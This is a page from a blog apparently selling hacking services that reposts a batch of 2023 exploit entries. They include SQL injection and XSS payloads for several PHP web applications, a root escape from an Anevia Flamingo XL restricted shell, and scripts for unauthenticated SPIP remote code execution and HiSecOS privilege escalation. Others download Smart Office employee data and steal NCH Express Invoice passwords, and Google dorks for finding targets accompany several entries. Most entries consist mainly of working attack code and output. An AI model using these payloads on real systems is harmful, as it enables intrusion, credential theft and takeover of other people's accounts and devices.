Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863584761

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Exploit Title: projectSend r1605 - CSV injection
Version: r1605
Bugs:  CSV Injection
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 11-06-2023
Author: Mirabbas Ağalarov
Tested on: Windows


2. Technical Details & POC
========================================
Step 1. login as user
step 2. Go to My Account ( http://localhost/users-edit.php?id=2 )
step 3. Set name as  =calc|a!z|
step 3. If admin Export action-log as CSV  file ,in The computer of admin  occurs csv injection and will open calculator ( http://localhost/actions-log.php )

payload: =calc|a!z|
HireHackking 
Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Exploit Author: LiquidWorm
Product web page: https://www.ateme.com
Affected version: 3.2.9
                  Hardware revision 1.0
                  SoapLive 2.0.3

Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.

Desc: Once the admin establishes a secure shell session, she gets
dropped into a sandboxed environment using the login binary that
allows specific set of commands. One of those commands that can be
exploited to escape the jailed shell is traceroute. A remote attacker
can breakout of the restricted environment and have full root access
to the device.

Tested on: GNU/Linux 3.1.4 (x86_64)
           Apache/2.2.15 (Unix)
           mod_ssl/2.2.15
           OpenSSL/0.9.8g
           DAV/2
           PHP/5.3.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5780
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php


13.04.2023

--


$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
Anevia Flamingo XL
root@192.168.1.1's password:
Primary-XL> help
available commands:
  bonding
  config
  date
  dns
  enable
  ethconfig
  exit
  exp
  firewall
  help
  hostname
  http
  igmpq
  imp
  ipconfig
  license
  log
  mail
  passwd
  persistent_logs
  ping
  reboot
  reset
  route
  serial
  settings
  sslconfig
  tcpdump
  timezone
  traceroute
  upgrade
  uptime
  version
  vlanconfig

Primary-XL> tcpdump ;id
tcpdump: illegal token: ;
Primary-XL> id
unknown command id
Primary-XL> whoami
unknown command whoami
Primary-XL> ping ;id
ping: ;id: Host name lookup failure
Primary-XL> traceroute ;id
BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary

Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
        [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
        [-z pausemsecs] host [data size]

trace the route ip packets follow going to "host"
Options:
        -F      Set the don't fragment bit
        -I      Use ICMP ECHO instead of UDP datagrams
        -l      Display the ttl value of the returned packet
        -d      Set SO_DEBUG options to socket
        -n      Print hop addresses numerically rather than symbolically
        -r      Bypass the normal routing tables and send directly to a host
        -v      Verbose output
        -m max_ttl      Set the max time-to-live (max number of hops)
        -p port#        Set the base UDP port number used in probes
                (default is 33434)
        -q nqueries     Set the number of probes per ``ttl'' to nqueries
                (default is 3)
        -s src_addr     Use the following IP address as the source address
        -t tos  Set the type-of-service in probe packets to the following value
                (default 0)
        -w wait Set the time (in seconds) to wait for a response to a probe
                (default 3 sec)
        -g      Specify a loose source route gateway (8 maximum)

uid=0(root) gid=0(root) groups=0(root)
Primary-XL> version
Software Revision: Anevia Flamingo XL v3.2.9
Hardware Revision: 1.0
(c) Anevia 2003-2012
Primary-XL> traceroute ;sh
...
...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ls -al
drwxr-xr-x   19 root     root         1024 Oct  3  2022 .
drwxr-xr-x   19 root     root         1024 Oct  3  2022 ..
drwxr-xr-x    2 root     root         1024 Oct 21  2013 bin
drwxrwxrwt    2 root     root           40 Oct  3  2022 cores
drwxr-xr-x   13 root     root        27648 May 22 00:53 dev
drwxr-xr-x    3 root     root         1024 Oct 21  2013 emul
drwxr-xr-x   48 1000     1000         3072 Oct  3  2022 etc
drwxr-xr-x    3 root     root         1024 Oct  3  2022 home
drwxr-xr-x   11 root     root         3072 Oct 21  2013 lib
lrwxrwxrwx    1 root     root           20 Oct 21  2013 lib32 -> /emul/ia32-linux/lib
lrwxrwxrwx    1 root     root            3 Oct 21  2013 lib64 -> lib
drwx------    2 root     root        12288 Oct 21  2013 lost+found
drwxr-xr-x    4 root     root         1024 Oct 21  2013 mnt
drwxrwxrwt    2 root     root           80 May 22 00:45 php_sessions
dr-xr-xr-x  177 root     root            0 Oct  3  2022 proc
drwxr-xr-x    4 root     root         1024 Oct 21  2013 root
drwxr-xr-x    2 root     root         2048 Oct 21  2013 sbin
drwxr-xr-x   12 root     root            0 Oct  3  2022 sys
drwxrwxrwt   26 root     root         1140 May 22 01:06 tmp
drwxr-xr-x   10 1000     1000         1024 Oct 21  2013 usr
drwxr-xr-x   14 root     root         1024 Oct 21  2013 var

ls /var/www/admin
_img                           configuration.php              log_securemedia.php            stream_dump.php
_lang                          cores_and_logs_management.php  login.php                      stream_services
_lib                           dataminer_handshake.php        logout.php                     streaming.php
_style                         dvbt.php                       logs.php                       support.php
about.php                      dvbt_scan.php                  main.php                       template
ajax                           export.php                     manager.php                    time.php
alarm.php                      fileprogress.php               network.php                    toto.ts
alarm_view.php                 firewall.php                   pear                           upload_helper.php
authentication.php             get_config                     power.php                      uptime.php
bridges.php                    get_enquiry_pending.php        read_settings.php              usbloader.php
cam.php                        get_upgrade_error.php          receive_helper.php             version.php
channel.php                    heartbeat.php                  rescrambling                   webradio.php
channel_xl_list.php            include                        rescrambling.php               webtv
check_state                    input.php                      resilience                     webtv.php
class                          js                             resilience.php                 xmltv.php
common                         license.php                    restart_service.php
config_snmp.php                log.php                        set_oem.php

python -c 'import pty; pty.spawn("/bin/bash")'
root@Primary-XL:/# cd /usr/local/bin
root@Primary-XL:/usr/local/bin# ls -al login
-rwxr-xr-x    1 root     root        35896 Feb 21  2012 login
root@Primary-XL:/usr/local/bin# cd ..
root@Primary-XL:/usr/local# ls commands/
bonding          firewall         mail             timezone
config           help             passwd           traceroute
date             hostname         persistent_logs  upgrade
dbg-serial       http             ping             uptime
dbg-set-oem      igmpq            route            version
dbg-updates-log  imp              serial           vlanconfig
dns              ipconfig         settings
ethconfig        license          sslconfig
exp              log              tcpdump
root@Primary-XL:/usr/local# exit
exit
Primary-XL> enable
password:
Primary-XL# ;]
HireHackking 
Exploit Title: projectSend r1605 - Stored XSS
Application: projectSend
Version: r1605
Bugs:  Stored Xss
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 11-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux 

2. Technical Details & POC
========================================

1. Login as admin
2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php)
3. Go to new JS (http://localhost/custom-assets-add.php?language=js)
4. Set content as  alert("xss"); and set public 
5. And Save
6. Go to http://localhost (logout)

payload: alert("xss")

POST /custom-assets-add.php HTTP/1.1
Host: localhost
Content-Length: 171
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/custom-assets-add.php?language=js
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2l
Connection: close

csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head
HireHackking 
# Exploit Title: Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-12
# Exploit Author: tmrswrr
# Vendor Homepage: https://xoops.org/
# Software https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.10
# Version: 2.5.10
# Tested : https://www.softaculous.com/apps/cms/Xoops


--- Description ---

1) Login admin panel and click Image Manager , choose Add Category : 
https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images
2) Write your payload in the Category Name field and submit:
Payload: <script>alert(1)</script>
3) After click multiupload , when you move the mouse to the payload name, you will see the alert button
https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2
HireHackking
# Exploit Title: Monstra 3.0.4 - Stored Cross-Site Scripting (XSS) # Date: 2023-06-13 # Exploit Author: tmrswrr # Vendor Homepage: https://monstra.org/ # Software Link: https://monstra.org/monstra-3.0.4.zip # Version: 3.0.4 # Tested : https://www.softaculous.com/softaculous/demos/Monstra --- Description --- 1) Login admin panel and go to Pages: https://demos3.softaculous.com/Monstraggybvrnbr4/admin/index.php?id=pages 2) Click edit button and write your payload in the Name field: Payload: "><script>alert(1)</script> 3) After save change and will you see alert button https://demos3.softaculous.com/Monstraggybvrnbr4/
HireHackking

Groomify v1.0 - SQL Injection

HACKER · %s · %s

# Exploit Title: Groomify v1.0 - SQL Injection # Date: 2023-06-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114# # Demo Site: https://script.bugfinder.net/groomify # Tested on: Kali Linux # CVE: N/A ### Vulnerable URL ### https://localhost/groomify/blog-search?search=payload ### Parameter & Payloads ### Parameter: search (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: search=deneme' AND (SELECT 1642 FROM (SELECT(SLEEP(5)))Xppf) AND 'rszk'='rszk
HireHackking

The Shop v2.5 - SQL Injection

HACKER · %s · %s

# Exploit Title: The Shop v2.5 - SQL Injection # Date: 2023-06-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/the-shop/34858541 # Demo Site: https://shop.activeitzone.com # Tested on: Kali Linux # CVE: N/A ### Request ### POST /api/v1/carts/add HTTP/1.1 Content-Type: application/json Accept: application/json, text/plain, */* x-requested-with: XMLHttpRequest x-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4 Referer: https://localhost Cookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL; the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7 Content-Length: 81 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null} ### Parameter & Payloads ### Parameter: JSON qty ((custom) POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420) THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495) END))","temp_user_id":null} Type: time-based blind Title: MySQL > 5.0.12 OR time-based blind (heavy query) Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR 2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)","temp_user_id":null}
HireHackking

Jobpilot v2.61 - SQL Injection

HACKER · %s · %s

# Exploit Title: Jobpilot v2.61 - SQL Injection # Date: 2023-06-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822 # Demo Site: https://jobpilot.templatecookie.com # Tested on: Kali Linux # CVE: N/A ----- PoC: SQLi ----- Parameter: long (GET) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766) AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT (ELT(4894=4894,1))),0x71786b7171)) AND (1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL Fire Contract Counties, California, United States&category=&price_min=&price_max=&tag= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766) AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND (1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL Fire Contract Counties, California, United States&category=&price_min=&price_max=&tag=
HireHackking
# Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS) # Exploit Author: tmrswrr / Hulya Karabag # Vendor Homepage: https://www.diafancms.com/ # Version: 6.0 # Tested on: https://demo.diafancms.com Description: 1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field: Payload : "><script>alert(document.domain)<%2Fscript> 2) After will you see alert button : https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0
HireHackking
# Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password # Dork: inurl:/wp-includes/class-wp-query.php # Date: 2023-06-19 # Exploit Author: Amirhossein Bahramizadeh # Category : Webapps # Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html # Version: 1.0.0 (REQUIRED) # Tested on: Windows/Linux # CVE: CVE-2020-11027 import requests from bs4 import BeautifulSoup from datetime import datetime, timedelta # Set the WordPress site URL and the user email address site_url = 'https://example.com' user_email = 'user@example.com' # Get the password reset link from the user email # You can use any email client or library to retrieve the email # In this example, we are assuming that the email is stored in a file named 'password_reset_email.html' with open('password_reset_email.html', 'r') as f: email = f.read() soup = BeautifulSoup(email, 'html.parser') reset_link = soup.find('a', href=True)['href'] print(f'Reset Link: {reset_link}') # Check if the password reset link expires upon changing the user password response = requests.get(reset_link) if response.status_code == 200: # Get the expiration date from the reset link HTML soup = BeautifulSoup(response.text, 'html.parser') expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1] expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p') print(f'Expiration Date: {expiration_date}') # Check if the expiration date is less than 24 hours from now if expiration_date < datetime.now() + timedelta(hours=24): print('Password reset link expires upon changing the user password.') else: print('Password reset link does not expire upon changing the user password.') else: print(f'Error fetching reset link: {response.status_code} {response.text}') exit()
HireHackking
# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS) # Dork: inurl:~/admin/views/admin.php # Date: 2023-06-20 # Exploit Author: Amirhossein Bahramizadeh # Category : Webapps # Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social # Version: 1.0.1 (REQUIRED) # Tested on: Windows/Linux # CVE : CVE-2023-3320 import requests import hashlib import time # Set the target URL url = "http://example.com/wp-admin/admin.php?page=wpss_settings" # Set the user agent string user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" # Generate the nonce value nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest() # Set the data payload payload = { "wpss_nonce": nonce, "wpss_setting_1": "value_1", "wpss_setting_2": "value_2", # Add additional settings as needed } # Set the request headers headers = { "User-Agent": user_agent, "Referer": url, "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983", # Add additional headers as needed } # Send the POST request response = requests.post(url, data=payload, headers=headers) # Check the response status code if response.status_code == 200: print("Request successful") else: print("Request failed")
HireHackking
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated) # Google Dork: inurl:"/spip.php?page=login" # Date: 19/06/2023 # Exploit Author: nuts7 (https://github.com/nuts7/CVE-2023-27372) # Vendor Homepage: https://www.spip.net/ # Software Link: https://files.spip.net/spip/archives/ # Version: < 4.2.1 (Except few fixed versions indicated in the description) # Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0 # CVE reference : CVE-2023-27372 (coiffeur) # CVSS : 9.8 (Critical) # # Vulnerability Description: # # SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1. # This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges. # # Usage: python3 CVE-2023-27372.py http://example.com import argparse import bs4 import html import requests def parseArgs(): parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7") parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL") parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute") parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)") return parser.parse_args() def get_anticsrf(url): r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10) soup = bs4.BeautifulSoup(r.text, 'html.parser') csrf_input = soup.find('input', {'name': 'formulaire_action_args'}) if csrf_input: csrf_value = csrf_input['value'] if options.verbose: print("[+] Anti-CSRF token found : %s" % csrf_value) return csrf_value else: print("[-] Unable to find Anti-CSRF token") return -1 def send_payload(url, payload): data = { "page": "spip_pass", "formulaire_action": "oubli", "formulaire_action_args": csrf, "oubli": payload } r = requests.post('%s/spip.php?page=spip_pass' % url, data=data) if options.verbose: print("[+] Execute this payload : %s" % payload) return 0 if __name__ == '__main__': options = parseArgs() requests.packages.urllib3.disable_warnings() requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' try: requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' except AttributeError: pass csrf = get_anticsrf(url=options.url) send_payload(url=options.url, payload="s:%s:\"<?php system('%s'); ?>\";" % (20 + len(options.command), options.command))
HireHackking

HiSecOS 04.0.01 - Privilege Escalation

HACKER · %s · %s

# Exploit Title: HiSecOS 04.0.01 - Privilege Escalation # Google Dork: HiSecOS Web Server Vulnerability Allows User Role Privilege Escalation # Date: 21.06.2023 # Exploit Author: dreizehnutters # Vendor Homepage: https://dam.belden.com/dmm3bwsv3/assetstream.aspx?assetid=15437&mediaformatid=50063&destinationid=10016 # Version: HiSecOS-04.0.01 or lower # Tested on: HiSecOS-04.0.01 # CVE: BSECV-2021-07 #!/bin/bash if [[ $# -lt 3 ]]; then echo "Usage: $0 <IP> <USERNAME> <PASSWORD>" exit 1 fi target="$1" user="$2" pass="$3" # Craft basic header auth=$(echo -ne "$user:$pass" | base64) # Convert to ASCII hex blob=$(printf "$user" | xxd -ps -c 1) # Generate XML payload ('15' -> admin role) gen_payload() { cat <<EOF <rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:x-mops:1.0 ../mops.xsd" message-id="20"> <mibOperation xmlns="urn:x-mops:1.0"> <edit-config> <MIBData> <MIB name="HM2-USERMGMT-MIB"> <Node name="hm2UserConfigEntry"> <Index> <Attribute name="hm2UserName">$blob</Attribute> </Index> <Set name="hm2UserAccessRole">15</Set> </Node> </MIB> </MIBData> </edit-config> </mibOperation> </rpc> EOF } curl -i -s -k -X POST \ -H "content-type: application/xml" \ -H "authorization: Basic ${auth}" \ --data-binary "$(gen_payload)" \ "https://${target}/mops_data" echo "[*] $user is now an admin"
HireHackking
# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated) # Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office" # Date: 09/Dec/2022 # Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/) # Vendor Homepage: https://smartofficepayroll.com/ # Software Link: https://smartofficepayroll.com/downloads # Version: Smart Office Web 20.28 and before # CVE Number : CVE-2022-47075 and CVE-2022-47076 # CVSS : 7.5 (High) # Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/ # Vulnerability Description: # Smart Office Web 20.28 and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails. import wget import os from colorama import Fore, Style def download_file(url, filename): wget.download(url, filename) # Disclaimer print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.") print("The author takes no responsibility for any unauthorized usage.") print("Please use this script responsibly and adhere to the legal and ethical guidelines.") agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ") if agree != "1": print("You have chosen not to agree. Exiting the script.") exit() # Print name in red name = "Exploit by Tejas Nitin Pingulkar" print(Fore.RED + name) print(Style.RESET_ALL) # Reset color website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ") target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ") folder_name = input("Enter the folder name to save the files: ") # Create the folder if it doesn't exist if not os.path.exists(folder_name): os.makedirs(folder_name) urls_filenames = [] if target_version == "1": urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv")) else: urls_filenames.extend([ (website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"), (website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"), (website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"), (website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv") ]) print("CVE-2022-47076: Obtain user ID and password from downloaded source") for url, filename in urls_filenames: download_file(url, os.path.join(folder_name, filename)) # Print "for more such interesting exploits, visit cvewalkthrough.com" in red print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com") print(Style.RESET_ALL) # Reset color
HireHackking
# Exploit Title: NCH Express Invoice - Clear Text Password Storage and Account Takeover # Google Dork:: intitle:ExpressInvoice - Login # Date: 07/Apr/2020 # Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/) # Vendor Homepage: https://www.nchsoftware.com/ # Software Link: http://www.oldversiondownload.com/oldversions/express-8-05-2020-06-08.exe # Version: NCH Express Invoice 8.24 and before # CVE Number : CVE-2020-11560 # CVSS: 7.8 (High) # Reference: https://cvewalkthrough.com/cve-2020-11560/ # Vulnerability Description: # Express Invoice is a thick client application that has functionality to allow the application access over the web. While configuring web access function application ask for user details such as username, password, email, etc. Application stores this information in “C:\ProgramData\NCH Software\ExpressInvoice\Accounts” in clear text as well as due to inadequate folder pemtion any Low prevladge authenticated user can access files stored in cleartext format #Note: from version 8.24 path changed to “C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts” import os import urllib.parse # Enable ANSI escape sequences for colors on Windows if os.name == 'nt': os.system('') # Function to decode URL encoding def decode_url(url): decoded_url = urllib.parse.unquote(url) return decoded_url # Function to list files and display as numeric list def list_files(file_list): for i, file in enumerate(file_list, start=1): # Omit the part of the file name after %40 username = file.split("%40")[0] print(f"{i}. {username}") # Main program print("\033[93mDisclaimer: This script is for educational purposes only.") print("The author takes no responsibility for any unauthorized usage.") print("Please use this script responsibly and adhere to the legal and ethical guidelines.\033[0m") agreement = input("\033[93mDo you agree to the terms? (yes=1, no=0): \033[0m") if agreement != '1': print("\033[93mYou did not agree to the terms. Exiting the program.\033[0m") exit() nch_version = input("\033[93mIs the targeted NCH Express Invoice application version less than 8.24? (yes=1, no=0): \033[0m") if nch_version == '1': file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts" else: file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\Accounts" file_list = os.listdir(file_directory) print("\033[94mUser Accounts:\033[0m") list_files(file_list) selected_file = input("\033[94mSelect the file number for the user: \033[0m") selected_file = int(selected_file) - 1 file_path = os.path.join(file_directory, file_list[selected_file]) with open(file_path, 'r') as file: contents = file.read() print(f"\033[94mSelected User: {file_list[selected_file].split('%40')[0]}\033[0m") exploit_option = input("\n\033[94mSelect the exploit option: " "\n1. Display User Passwords " "\n2. Account Takeover Using Password Replace " "\n3. User Privilege Escalation\nOption: \033[0m") # Exploit actions if exploit_option == "1": decoded_contents = decode_url(contents) print("\033[91mPlease find the password in the below string:\033[0m") print(decoded_contents) elif exploit_option == "2": new_password = input("\033[92mEnter the new password: \033[0m") current_password = contents.split("Password=")[1].split("&")[0] replaced_contents = contents.replace(f"Password={current_password}", f"Password={new_password}") print("\033[92mSelected user's password changed to: Your password\033[0m") print(replaced_contents) with open(file_path, 'w') as file: file.write(replaced_contents) elif exploit_option == "3": replaced_contents = contents.replace("Administrator=0", "Administrator=1").replace("Priviligies=2", "Priviligies=1") print("\033[92mUser is now an Administrator.\033[0m") print(replaced_contents) with open(file_path, 'w') as file: file.write(replaced_contents) else: print("\033[91mInvalid exploit option. Exiting the program.\033[0m") exit() print("\033[91mFor more such interesting exploits, visit cvewalkthrough.com\033[0m") input("\033[91mPress enter to exit.\033[0m")
HireHackking
## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi ## Author: nu11secur1ty ## Date: 06.12.2023 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The password parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+' was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can dump all information from the database of this system, and then he can use it for dangerous and malicious purposes! STATUS: HIGH-CRITICAL Vulnerability [+]Payload: ```mysql --- Parameter: password (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') OR NOT 1404=1404-- Eotr Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT (ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html) ## Time spend: 01:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking
